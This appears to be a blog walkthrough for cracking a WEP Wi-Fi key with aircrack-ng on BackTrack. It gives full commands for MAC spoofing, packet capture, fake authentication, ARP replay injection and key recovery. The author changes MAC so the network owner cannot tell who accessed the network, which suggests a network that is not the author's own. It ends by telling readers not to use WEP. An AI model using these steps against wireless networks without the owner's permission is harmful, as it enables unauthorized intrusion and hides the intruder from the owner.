Hacking WEP Password is not a new topic anymore since aircrack was first released in 2006. This software suite consists of many tools for detecting, analyzing, monitoring network, sniffing packing and hacking WEP / WPA (Dictionary attack) password. It only supports protocol 802.11x Wireless and network adapter with allows raw monitoring mode (a example list of this type of adapter you can find at following link http://www.aircrack-ng.org/doku.php?id=compatibility_drivers#list_of_compatible_adapters).
Monitor mode is one of 6 modes which a 802.11 wireless card can operate in: Ad-hoc, Master (acting as access point) , Mesh, Monitor, Repeater. Unlike promiscuous mode, which is also used for packet sniffing and can be used on both wired and wireless networks, monitor mode allows packets to be captured without having to associate with an access point or ad-hoc network first and only applies to wireless networks. Therefore be careful when choosing network adapter, you must choose the correct one which stands on the support list otherwise you can not sniff packet from victim network. When I mean “correct”, I mean that it must be exactly same as stated in list. In my demo, I’ll use the USB Wireless Network Adapter “Netgear Wg111v2” which costs about 6 Euro on Ebay. You can find the version of this series on the side of USB stick like the image below.
Or you can buy a new one in Amazon which can be sure with correct version
Netgear Wg111v2 Usb Wifi Card Includes Driver Cd and USB Extender Cable
After having a suitable wireless network adapter, you can get the latest version of Backtrack at its homepage http://www.backtrack-linux.org/downloads/ . BackTrack is a GNU/Linux distribution distributed as a Live DVD aimed at digital forensics use and penetration testing. BackTrack provides users with easy access to a comprehensive and large collection of security-related tools ranging from port scanners to password crackers. Aircrack-ng is also included in Backtrack CD therefore you do not need to download and install which requires again internet connection.
I tried to make the demo in Virtual Box but I can not achieve to make the USB wireless network adapter to work with Backtrack. Backtrack can not recognize this adapter although I made several tries with settings and configurations. Therefore I must stay out of Windows, boot my computer directly from Backtrack CD. And below are the steps I did to crack a password of WEP protocol.
1. Boot computer from Backtrack CD, choose first option then you’ll land in command window after Backtrack finishes its start up. Enter ‘startx’ to enter GUI mode from command line.
2. Open a command console, enter “airmon-ng” to list all available network interfaces which aircrack could detect (when using Backtrack in Virtual Box there’s nothing from this command).
“airmon-ng” is a software from this suite placing card in monitor mode but first I would like to change my MAC address because I don’t want the owner of network find out who has accessed his network.
3. So let’s stop wlan0 interface and change its MAC address to fake one.
root@bt:~# airmon-ng stop wlan0 root@bt:~# ifconfig wlan0 down root@bt:~# macchanger --mac 00:12:34:56:78:90 wlan0
The image below summarizes 3 steps above
4. Now remember to start network interface again so that we can inject the packets into traffics and sniff packet from network.
root@bt:~# airmon-ng start wlan0
5. Write down our new interface for wlan0, it maybe mon0 or wifi0. Now, let’s see which available wireless network we have nearby. We can enumerate all of them with detailed information with airodump-ng.
root@bt:~# airodump-ng mon0
6. Cracking WEP password with aircrack bases on the idea that the data was encrypted with the Pre-shared key and cause of weak algorithms of WEP protocol we can get the Pre-shared key back from encrypted data if we have collected enough. So in next step we’ll start to collect/sniff data. So let’s start airodump to sniff from network o2* which is protected by WEP protocol. The sniffed data will be saved in a file which then will be used for cracking password of aircrack. The “bssid” you can read from the output of the command above.
root@bt:~# airodump-ng -c <channel> -w <filename> --bssid <bssid> <interface>
In our case
root@bt:~# airodump-ng -c 1 -w backtrack --bssid 00:19:xx:xx:xx:xx mon0
6. Ok, we can already sniff traffics to access point but aircrack needs a lot of packets to calculate and figure out the password. The more data we sniff, the faster we can crack the password. Only sniffing data is not enough because the sniffed data “can be” not correctly optimized for cracking algorithms. Injecting a special format data to get special result which helps the cracking process to run faster will be a good idea. Therefore we’ll use aireplay to inject packets into communication between access point and our network adapter to force more sending/receiving packets so that we can speed up the whole process. Let’s the first command console open, open the new one and enter the command below to associate to network with fake authentication
root@bt:~# aireplay-ng -1 0 -a <bssid> -h <MAC Address> -e <essid> <interface>
in our case
root@bt:~# aireplay-ng -1 0 -a 00:19:xx:xx:xx:xx -h 00:12:34:56:78:90 -e o2x mon0
7. After associating successfully to WEP network, then start to injecting/flooding data to network.
root@bt:~# aireplay-ng -3 -b <bssid> -h <MAC Address> <interface>
in our case
root@bt:~# aireplay-ng -3 -b 00:19:xx:xx:xx:xx -h 00:12:34:56:78:90 mon0
After injecting, wait for moment you’ll see it start to read/write packets crazily and the amount of sniffing data increasing rapidly
In case there is no host connecting to Access Point (AP) you will not receive any data. Therefore instead of calling the command above after authentication, you can use this command
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b <bssid> -h <MAC Address> <interface>
in our case
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:19:xx:xx:xx:xx -h 00:12:34:56:78:90 mon0
Wait for a while and choose “y” for question “Use this packet”.
8. Wait until the amount of sniffing data reach over than 20000. I made a small experiment with amount of sniffed data with same network. Sometimes 10000 packets are already enough, but sometimes although after sniffing over 50000 packets aircrack still can not crack the password. So I think 20000 will be an acceptable threshold to start cracking password with command below in new console.
root@bt:~# aircrack-ng -b <bssid> <filename>
in our case
root@bt:~# aircrack-ng -b 00:19:xx:xx:xx:xx backtrack-01.cap
Be careful with the file name of capture file, it will be different with which you entered. Use Tab-key to auto complete the file name and choose the .cap extension for it. You can see that the password “LJxxxxxxxxxxx” is 13 characters long with small and capital characters. There is no way to crack this password with brute force. Thanks to aircrack we can crack the password in some minutes and this blog again proves that WEP is not a secure protocol. Do not use WEP.
In case there is no host connecting to AP (Access Point)